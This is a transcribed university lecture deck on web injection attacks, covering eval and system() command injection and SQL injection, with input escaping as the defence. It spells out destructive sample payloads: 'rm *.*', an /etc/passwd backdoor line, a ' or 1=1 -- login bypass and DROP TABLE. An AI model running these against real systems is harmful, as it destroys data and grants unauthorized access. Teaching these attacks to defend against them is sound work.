web security injection attacks
play

Web Security: Injection Attacks CS 161: Computer Security Prof. - PowerPoint PPT Presentation

Oct 14, 2022 •200 likes •1.13k views

Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa March 20, 2018 Credit: some slides are adapted from previous offerings of this course and from CS 241 of Prof. Dan Boneh What can go bad if a web server is

  1. Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa March 20, 2018 Credit: some slides are adapted from previous offerings of this course and from CS 241 of Prof. Dan Boneh

  2. What can go bad if a web server is compromised? • Steal sensitive data (e.g., data from many users) • Change server data (e.g., affect users) • Gateway to enabling attacks on clients • Impersonation (of users to servers, or vice versa) • Others 2

  3. A set of common attacks • SQL Injection ■ Browser sends malicious input to server ■ Bad input checking leads to malicious SQL query • XSS – Cross-site scripting ■ Attacker inserts client-side script into pages viewed by other users, script runs in the users’ browsers • CSRF – Cross-site request forgery ■ Bad web site sends request to good web site, using credentials of an innocent victim who “visits” site 3

  4. Today’s focus: injection attacks 4

  5. Historical perspective • The first public discussions of SQL injection started appearing around 1998 phreak + hack In the Phrack magazine First published in 1985 • Hundreds of proposed fixes and solutions 5

  6. Top web vulnerabilities !!! Please don’t repeat common mistakes!! 6

  7. General code injection attacks • Attacker user provides bad input • Web server does not check input format • Enables attacker to execute arbitrary code on the server

  8. Example: code injection based on eval (PHP) • $_GET[‘A’]: gets the input with value A from a GET HTTP request 1. User visits calculator and writes 3+5 ENTER 2. User’s browser sends HTTP request http://site.com/calc.php?exp=“ 3+5” 3. Script at server receives http request and runs $_GET(“exp”) =“ 3+5” • $_POST[‘B’]: gets the input with value B from a POST HTTP request 8

  9. Example: code injection based on eval (PHP) • eval allows a web server to evaluate a string as code • e.g. eval (‘$result = 3+5’) produces 8 calculator: http://site.com/calc.php http://site.com/calc.php?exp=“ 3+5” $exp = $_GET[‘exp']; eval (’$result = ' . $exp . ';'); Attack: http://site.com/calc.php?exp=“ 3+5 ; system(‘rm *.*’)” 9

  10. Code injection using system() • Example: PHP server-side code for sending email $email = $_POST[“email”] $subject = $_POST[“subject”] system(“mail $email –s $subject < /tmp/joinmynetwork”) • Attacker can post http://yourdomain.com/mail.php? email=hacker@hackerhome.net & subject=“foo < /usr/passwd; ls” http://yourdomain.com/mail.php? email=hacker@hackerhome.net&subject=“foo; echo \“evil::0:0:root:/:/bin/sh\">>/etc/passwd; ls”

  11. SQL injection 11

  12. Structure of Modern Web Services URL / Form command.php? Browser Web arg1=x&arg2= server y Database server

  13. Structure of Modern Web Services URL / Form command.php? Browser Web arg1=x&arg2= server y Database query built from x and y Database server

  14. Structure of Modern Web Services Browser Web server Custom data corresponding to x & y Database server

  15. Structure of Modern Web Services Browser Web server Web page built using custom data Database server

  16. Databases • Structured collection of data ■ Often storing tuples/rows of related values ■ Organized in tables Customer AcctNum Username Balance 1199 zuckerberg 35.7 0501 bgates 79.2 … … …

  17. Databases • Widely used by web services to store server and user information • Database runs as separate process to which web server connects ■ Web server sends queries or commands derived from incoming HTTP request ■ Database server returns associated values or modifies/updates values

  18. SQL • Widely used database query language ■ (Pronounced “ess-cue-ell” or “sequel”) • Fetch a set of rows: SELECT column FROM table WHERE condition returns the value(s) of the given column in the specified table, for all records where condition is true. • e.g: Customer SELECT Balance FROM Customer AcctNum Username Balance 1199 zuckerberg 35.71 WHERE Username='bgates' 0501 bgates 79.2 will return the value 79.2 … … … … … …

  19. SQL (cont.) • Can add data to the table (or modify): INSERT INTO Customer VALUES (8477, 'oski', 10.00); Customer AcctNum Username Balance 1199 zuckerberg 35.7 0501 bgates 79.2 8477 oski 10.00 … … …

  20. SQL (cont.) • Can delete entire tables: DROP TABLE Customer • Issue multiple commands, separated by semicolon: INSERT INTO Customer VALUES (4433, 'vladimir', 70.0); SELECT AcctNum FROM Customer WHERE Username='vladimir' returns 4433.

  21. SQL Injection Scenario • Suppose web server runs the following code: $recipient = $_POST[‘recipient’]; $sql = "SELECT AcctNum FROM Customer WHERE Username=' $recipient ' "; $rs = $db->executeQuery($sql); • Server stores URL parameter “recipient” in variable $recipient and then builds up a SQL query • Query returns recipient’s account number • Server will send value of $sql variable to database server to get account #s from database

  22. SQL Injection Scenario • Suppose web server runs the following code: $recipient = $_POST[‘recipient’]; $sql = "SELECT AcctNum FROM Customer WHERE Username=' $recipient ' "; $rs = $db->executeQuery($sql); • So for “?recipient=Bob” the SQL query is: "SELECT AcctNum FROM Customer WHERE Username='Bob' "

  23. Basic picture: SQL Injection Victim Web Server m r o f s u o i c i l a m $recipient specified by attacker t s o p 1 2 unintended receive valuable data 3 SQL query Attacker How can $recipient cause trouble here? SQL DB 23

  24. Problem $recipient = $_POST[‘recipient’]; $sql = "SELECT AcctNum FROM Customer WHERE Username=' $recipient ' "; $rs = $db->executeQuery($sql); Untrusted user input ‘recipient’ is embedded directly into SQL command Attack: $recipient = alice’; SELECT * FROM Customer;’ Returns the entire contents of the Customer!

  25. CardSystems Attack • CardSystems ■ credit card payment processing company ■ SQL injection attack in June 2005 ■ put out of business • The Attack ■ 263,000 credit card #s stolen from database ■ credit card #s stored unencrypted ■ 43 million credit card #s exposed 25

  27. Another example: buggy login page (ASP) set ok = execute( "SELECT * FROM Users WHERE user=' " & form(“user”) & " ' AND pwd=' " & form(“pwd”) & “ '” ); if not ok.EOF login success else fail; 27

  28. Enter SELECT * Username & FROM Users Web Password Web WHERE user='me' DB Browser Server (Client) AND pwd='1234' (1 row) Normal Query

  29. Another example: buggy login page (ASP) set ok = execute( "SELECT * FROM Users WHERE user=' " & form(“user”) & " ' AND pwd=' " & form(“pwd”) & “ '” ); if not ok.EOF login success else fail; Is this exploitable? 29

  30. Bad input • Suppose user = “ ' or 1=1 -- ” (URL encoded) • Then scripts does: ok = execute( SELECT … WHERE user= ' ' or 1=1 -- … ) ■ The “ -- ” causes rest of line to be ignored. ■ Now ok.EOF is always false and login succeeds. • The bad news: easy login to many sites this way. Besides logging in, what else can attacker do? 30

  31. Even worse: delete all data! • Suppose user = “ ′ ; DROP TABLE Users -- ” • Then script does: ok = execute( SELECT … WHERE user= ′ ′ ; DROP TABLE Users … ) 31

  32. What else can an attacker do? • Add query to create another account with password, or reset a password • Suppose user = “ ′ ; INSERT INTO TABLE Users (‘attacker’, ‘attacker secret’); ” • And pretty much everything that can be done by running a query on the DB!

  33. SQL Injection Prevention • Sanitizate user input: check or enforce that value/string that does not have commands of any sort • Disallow special characters, or • Escape input string SELECT PersonID FROM People WHERE Username=’ alice\’; SELECT * FROM People;’

  34. How to escape input You “escape” the SQL parser query commands Parser Web DB Server

  35. How to escape input • The input string should be interpreted as a string and not as a special character • To escape the SQL parser, use backslash in front of special characters, such as quotes or backslashes

  36. The SQL Parser does… • If it sees ’ it considers a string is starting or ending • If it sees \’ it considers it just as a character part of a string and converts it to ‘ For SELECT PersonID FROM People WHERE Username=’ alice\’; SELECT * FROM People;\’ The username will be matched against alice’; SELECT * FROM People;’ and no match found • Different parsers have different escape sequences or API for escaping

  37. Examples • What is the string username gets compared to (after SQL parsing), and when does it flag a syntax error? (syntax error appears at least when quotes are not closed) [..] WHERE Username=’alice’; alice [..] WHERE Username=’alice\’; Syntax error, quote not closed [..] WHERE Username=’alice\’’; alice’ [..] WHERE Username=’alice\\’; alice\ because \\ gets converted to \ by the parser

Recommend

Server-side Web Security: SQL Injection Attacks &amp; XSS CS 161: Computer Security Prof. David

Server-side Web Security: SQL Injection Attacks &amp; XSS CS 161: Computer Security Prof. David

Server-side Web Security: SQL Injection Attacks &amp; XSS CS 161: Computer Security Prof. David Wagner February 12, 2014 SQL Injection Scenario Suppose web server front end stores URL parameter recipient in variable $recipient and

656 views • 37 slides
Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa February 5,

Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa February 5,

Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa February 5, 2016 Credit: some slides are adapted from previous offerings of this course and from CS 241 of Prof. Dan Boneh What can go bad if a web server is

702 views • 37 slides
CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin ini CEH, ITIL L V3, 3, CCNA, CCNP, CASP, PCI-DS DSS.. .. Lead Security Researcher @ Netwatch Technologies Project Consultant, Information

377 views • 20 slides
Webapp security: SQL injection Network Security Lecture 9 Today We have finished analyzing

Webapp security: SQL injection Network Security Lecture 9 Today We have finished analyzing

Webapp security: SQL injection Network Security Lecture 9 Today We have finished analyzing the security of network protocols We will now focus on web applications and their vulnerabilities (and attacks) SQL injection Eike Ritter

815 views • 25 slides
Server -side security risks (esp sp. . injection jection atta ttacks) s) websec 1 Attacks

Server -side security risks (esp sp. . injection jection atta ttacks) s) websec 1 Attacks

Web Securi rity ty Server -side security risks (esp sp. . injection jection atta ttacks) s) websec 1 Attacks on the web server malicious input web server er output This can be attacks on Availability: i.e. DoS attack, where attacker

1.86k views • 79 slides
Security Psychology Topics Weve Covered Ethics XSS CSRF SQL injection

Security Psychology Topics Weve Covered Ethics XSS CSRF SQL injection

Security Psychology Topics Weve Covered Ethics XSS CSRF SQL injection Passwords Command injection Scanning Malware Most of these attacks are enabled by social engineering. Todays Class Pretexting

516 views • 26 slides
SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017

SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017

SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017 Rank Name 1 Injection 2 Broken Authentication 3 Sensitive Data Exposure 4 XML External Entities 5 Broken Access Control 6 Security

682 views • 8 slides
Outline Classic code injection attacks CSci 5271 Announcements intermission Introduction to

Outline Classic code injection attacks CSci 5271 Announcements intermission Introduction to

Outline Classic code injection attacks CSci 5271 Announcements intermission Introduction to Computer Security Day 4: Low-level attacks Shellcode techniques Stephen McCamant University of Minnesota, Computer Science &amp; Engineering

412 views • 5 slides
Countering Code-Injection Attacks With Instruction-Set Randomization Gaurav S. Kc, Angelos D.

Countering Code-Injection Attacks With Instruction-Set Randomization Gaurav S. Kc, Angelos D.

Countering Code-Injection Attacks With Instruction-Set Randomization Gaurav S. Kc, Angelos D. Keromytis Columbia University Vassilis Prevelakis Drexel University 1 Overview of Technique Protect from code-injection attacks create

608 views • 19 slides
Security Psychology Topics Weve Covered Ethics Distributed Systems (and attacks

Security Psychology Topics Weve Covered Ethics Distributed Systems (and attacks

Security Psychology Topics Weve Covered Ethics Distributed Systems (and attacks thereof) XSS CSRF SQL injection Most of these attacks are enabled by social engineering. Todays Class Pretexting Phishing

587 views • 25 slides
Code-Injection Attacks in Browsers Supporting Policies Elias Athanasopoulos , Vasilis Pappas, and

Code-Injection Attacks in Browsers Supporting Policies Elias Athanasopoulos , Vasilis Pappas, and

Code-Injection Attacks in Browsers Supporting Policies Elias Athanasopoulos , Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS What is all about? New code-injection attacks or return-to-libc attacks in the web

666 views • 48 slides
False Data Injection Attacks in Smart Grid: Challenges and Solutions Dr. Wei Yu Assistant

False Data Injection Attacks in Smart Grid: Challenges and Solutions Dr. Wei Yu Assistant

False Data Injection Attacks in Smart Grid: Challenges and Solutions Dr. Wei Yu Assistant Professor Department of Computer &amp; Information Sciences Towson University http://www.towson.edu/~wyu Email: wyu@towson.edu NIST Cyber Security for

688 views • 51 slides
Using Partial Taint Tracking To Protect Against Injection Attacks Ioannis Papagiannis , Matteo

Using Partial Taint Tracking To Protect Against Injection Attacks Ioannis Papagiannis , Matteo

PHP Aspis: Using Partial Taint Tracking To Protect Against Injection Attacks Ioannis Papagiannis , Matteo Migliavacca, Peter Pietzuch Department of Computing, Imperial College London USENIX WebApps 2011 Portland, OR, USA Injection

763 views • 47 slides
Systems Security: Side-channel attacks Stjepan Picek s.picek@tudelft.nl Delft University of

Systems Security: Side-channel attacks Stjepan Picek s.picek@tudelft.nl Delft University of

Systems Security: Side-channel attacks Stjepan Picek s.picek@tudelft.nl Delft University of Technology, The Netherlands May 6, 2018 Outline 1 Side-channels 2 Implementation Attacks 3 Side-channel Attacks 4 Fault Injection 2 / 48

824 views • 48 slides
Summary Introduction &amp; Cryptographic Background Hardware Support for Physical Security

Summary Introduction &amp; Cryptographic Background Hardware Support for Physical Security

Summary Introduction &amp; Cryptographic Background Hardware Support for Physical Security Side Channel Attacks Arnaud Tisserand Fault Injection Attacks CNRS, Lab-STICC laboratory CRiSIS 2017, Dinard, France Protections Examples

266 views • 15 slides
Web Security Cyber Security Lab Spring '10 04/15/10 Cyber Security Lab 1 Outline Web

Web Security Cyber Security Lab Spring '10 04/15/10 Cyber Security Lab 1 Outline Web

Web Security Cyber Security Lab Spring '10 04/15/10 Cyber Security Lab 1 Outline Web application weaknesses XSS AJAX weaknesses SQL Injection Attacks (Slides from Lars Olson)

588 views • 41 slides
Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for

Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for

Software and Web Security 2 Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for now) sws2 1 Recall: dynamically created web pages Most web pages you see are dynamically created (except for instance

1k views • 64 slides
Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for

Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for

Software and Web Security 2 Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for now) sws2 1 Recall: dynamically created web pages y y g Virtually all web pages you see are dynamically created

760 views • 63 slides
A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a

A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a

A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a password manager is a good idea! SQL injection is ironic SQL injection is funny Overviewtrated Account Summary Account: Account: &quot;SELECT

445 views • 32 slides
SQL Injection Attacks Many web servers have backing databases Much of their information

SQL Injection Attacks Many web servers have backing databases Much of their information

SQL Injection Attacks Many web servers have backing databases Much of their information stored in a database Web pages are built (in part) based on queries to a database Possibly using some client input . . . Lecture 16 Page 1

646 views • 21 slides
I n p u t sanitization); drop table slides New attacks and countermeasures: SQL

I n p u t sanitization); drop table slides New attacks and countermeasures: SQL

This time Continuing with Software Getting insane with Security I n p u t sanitization); drop table slides New attacks and countermeasures: SQL injection Background on web architectures A very basic web architecture Client

1.22k views • 102 slides
CPSC410/611: Security Security Security Attacks Security Threats Crypto

CPSC410/611: Security Security Security Attacks Security Threats Crypto

CPSC 410 / 611 : Operating Systems CPSC410/611: Security Security Security Attacks Security Threats Crypto Authentication Examples SSL Security Threats Breach of confidentiality unauthorized access to

458 views • 18 slides
CSS Injection Attacks or how to leak content with &lt;style&gt; * { author: Pepe Vila; year:

CSS Injection Attacks or how to leak content with &lt;style&gt; * { author: Pepe Vila; year:

CSS Injection Attacks or how to leak content with &lt;style&gt; * { author: Pepe Vila; year: 2019; } Historical background (might be historically inaccurate) ~2007: Gareth Heyes, David Lindsay and Eduardo Vela (from sla.ckers.org) published

412 views • 15 slides
Combining Static Analysis and Runtime Monitoring to Counter SQL-Injection Attacks William

Combining Static Analysis and Runtime Monitoring to Counter SQL-Injection Attacks William

Combining Static Analysis and Runtime Monitoring to Counter SQL-Injection Attacks William Halfond &amp; Alessandro Orso Georgia Institute of Technology This work was supported in part by NSF awards CCR-0306372, CCR-0205422, and CCR-0209322 to

187 views • 17 slides

More recommend